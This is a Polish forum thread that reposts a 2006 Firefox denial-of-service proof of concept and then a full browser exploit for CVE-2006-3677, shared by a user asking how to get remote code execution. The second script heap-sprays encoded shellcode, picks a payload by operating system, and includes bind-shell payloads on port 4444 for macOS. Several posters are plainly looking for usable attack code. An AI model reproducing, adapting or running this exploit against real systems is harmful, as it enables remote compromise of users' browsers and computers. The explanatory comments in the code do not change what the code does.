Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) DoS


globi_

<!-- 

--------------------------------------------------- 

Software: 

Firefox Web Browser 

Tested: 

Linux, Windows clients' version 1.5.0.2 

Result: 

Firefox Remote Code Execution and Denial of Service - Vendor contacted, no patch yet. 

Problem: 

A handling issue exists in how Firefox handles certain Javascript in js320.dll and 

xpcom_core.dll 

regarding iframe.contentWindow.focus(). By manipulating this feature a buffer overflow will 

occur. 

Proof of Concept: 

http://www.securident.com/vuln/ff.txt 

Credits: 

splices(splices [dot] org) 

spiffomatic64(spiffomatic64 [dot] com) 

Securident Technologies (securident [dot] com) 

------------------------------------------------ 



http://www.securident.com/vuln/ffdos.htm - PoC firefox dos 



Paste the below code snippet and view it in Firefox for DoS PoC or visit the link above. 

--> 



<textarea cols="0" rows="0" id="x_OtherInfo" 

name="x_OtherInfo"></textarea> 

<script> 

// Denial-of-service PoC for the issue described in the advisory text above.
// What the snippet does: it creates an editable (designMode) iframe next to
// the hidden textarea, starts writing a nested <iframe> into that document,
// and calls contentWindow.focus() before the document is closed. The advisory
// credits that focus() call, made while the document is still open, with the
// crash. Whether it is a memory-safety defect (the advisory says "buffer
// overflow") cannot be confirmed from this page, and no code execution is
// demonstrated here — the visible outcome is a browser crash. Affected
// versions per the title and test notes: <= 1.5.0.2. Mitigation: run a
// release newer than the affected ones.

// Look up the textarea by its name attribute; getElementsByName returns a
// collection, so the first entry is taken on the following line.
var textarea = document.getElementsByName("x_OtherInfo"); 

textarea=textarea.item(0); 

// Wrapper div (class "htmlarea") inserted immediately before the textarea;
// its only job is to host the iframe created below.
var htmlarea = document.createElement("div"); 

htmlarea.className = "htmlarea"; 

textarea.parentNode.insertBefore(htmlarea, textarea); 

// The iframe is created without a src attribute.
var iframe = document.createElement("iframe"); 

htmlarea.appendChild(iframe); 

// Handle to the iframe's document, used for all writes below.
var doc = iframe.contentWindow.document; 

// Make the frame's document editable before writing into it.
doc.designMode = "on"; 

// open() leaves the document in the "being written" state until close().
doc.open(); 

doc.write("<iframe src=''>"); 

// The advisory's trigger: focusing the frame while its document is still
// open between open()/write() and close(). (No statement terminator here,
// exactly as in the original post.)
iframe.contentWindow.focus() 

doc.close(); 

</script> 

</textarea> 



<!-- 

-DISCLAIMER- 

splices,spiffomatic64, and securident are not responsible for any of the information 

contained therein, 

this is all just for informational purposes only. -->
 

Czarna Mamba

@offtopic hej, szukałem tego po tych działach i nie znalazłem, proszę cię o link. Z góry dziękuję
 

Grzem

jeśli chodzi ci o exploit, to znajduje się powyżej. Przyjrzyj się dokładnie
 

Snowak

Ktoś wie jak tego używać? żeby zrobić z tego exploit typu Remote Code Execution
 

rafal

to jest exploit na DoS'a ... musisz poszukac na milw0rmie jakis na remote
 

Snowak

Znalazłem coś takiego:

<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system.
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is
trivial to turn into a working exploit. The demonstration link below will attempt
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
/**
 * Demo — proof-of-concept for CVE-2006-3677 (mfsa2006-45, Mozilla bug 342267)
 * as posted above. Per the page header it was tested on Firefox 1.5.0.4 and
 * fixed in 1.5.0.5; it needs the Java plugin, because the trigger is a call
 * into the page-visible `java.*` objects after `window.navigator` has been
 * replaced by a number (the two statements quoted in the header comment).
 *
 * From a defender's view the distinctive page-side artefacts are (1) very
 * large strings built by doubling an `unescape`d fill pattern and (2) the
 * assignment of a numeric value to `window.navigator` right before a
 * `java.lang.*` call. Mitigations, both stated on this page: update to
 * 1.5.0.5 or later, or disable/remove the Java plugin.
 *
 * No parameters and no return value; invoked from the button's onClick
 * handler below.
 */
function Demo() {

// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
// CVE-2006-3677

// The Java plugin is required for this to work

// Per-platform payloads. Each `shellcode_*` is a string of %u-escaped UTF-16
// code units (what each one is meant to do is taken from the comments that
// follow and is not verified here); `fill_*` is the pattern repeated around
// it; `addr_*` is the value later stored, halved, into window.navigator.
// win32 = calc.exe
var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
var fill_win32 = unescape('%u0800');
var addr_win32 = 0x08000800;

// linux = touch /tmp/METASPLOIT (unreliable)
var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
var fill_linux = unescape('%ua8a8');
var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

// mac os x ppc = bind a shell to 4444
var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
var fill_macppc = unescape('%u0c0c');
var addr_macppc = 0x0c000000;

// mac os x intel = bind a shell to 4444
// Thanks to nemo[at]felinemenace.org for shellcode
// Thanks to Todd Manning for the target information and testing
var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
var fill_macx86 = unescape('%u1c1c');
var addr_macx86 = 0x1c000000;


// Start the browser detection
// Payload selection by User-Agent substring. The four checks below are
// independent ifs, so when more than one substring matches, the last
// matching block wins.
var shellcode;
var addr;
var fill;
var ua = '' + navigator.userAgent;

if (ua.indexOf('Linux') != -1) {
alert('Trying to create /tmp/METASPLOIT');
shellcode = shellcode_linux;
addr = addr_linux;
fill = fill_linux;
}

if (ua.indexOf('Windows') != -1) {
alert('Trying to launch Calculator');
shellcode = shellcode_win32;
addr = addr_win32;
fill = fill_win32;
}

if (ua.indexOf('PPC Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macppc;
addr = addr_macppc;
fill = fill_macppc;
}

if (ua.indexOf('Intel Mac OS') != -1) {
alert('Trying to bind a shell to 4444');
shellcode = shellcode_macx86;
addr = addr_macx86;
fill = fill_macx86;
}

// No platform matched: as the alert text says, this path only attempts a
// crash rather than execution.
if (! shellcode) {
alert('OS not supported, only attempting a crash!');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
}

// Grow the fill pattern by repeated doubling until it exceeds 0x400000
// characters.
var b = fill;
while (b.length <= 0x400000) b+=b;

// Build the large string c from four 0x100000-character segments of fill,
// each ending with the payload.
var c = new Array();
for (var i =0; i<36; i++) {
c =
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode +
b.substring(0, 0x100000 - shellcode.length) + shellcode;
}


// Note: javaEnabled is not called here; this tests only that the property
// exists (it is truthy whenever the browser exposes the function).
if (window.navigator.javaEnabled) {
// The trigger: replace the navigator object with a number derived from the
// chosen addr (same statement as in the page's header comment). Why the
// plugin bridge accepts this is not verifiable from the page — presumably
// the number is later misinterpreted by the bridge; TODO confirm against the
// bugzilla entry referenced above.
window.navigator = (addr / 2);
try {
// Call into the plugin-exposed java.* objects after the swap.
java.lang.reflect.Runtime.newInstance(
java.lang.Class.forName("java.lang.Runtime"), 0
);
// Reaching this alert means the call returned normally, i.e. the browser
// did not react to the swapped navigator.
alert('Patched!');
}catch(e){
// The page treats any exception here as "no Java plugin": a ReferenceError
// on `java` lands here, but so would any other error from the call above.
alert('No Java plugin installed!');
}
}
}

</script>

Clicking the button below may crash your browser!


<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>


Jak to uzyc? ;s
 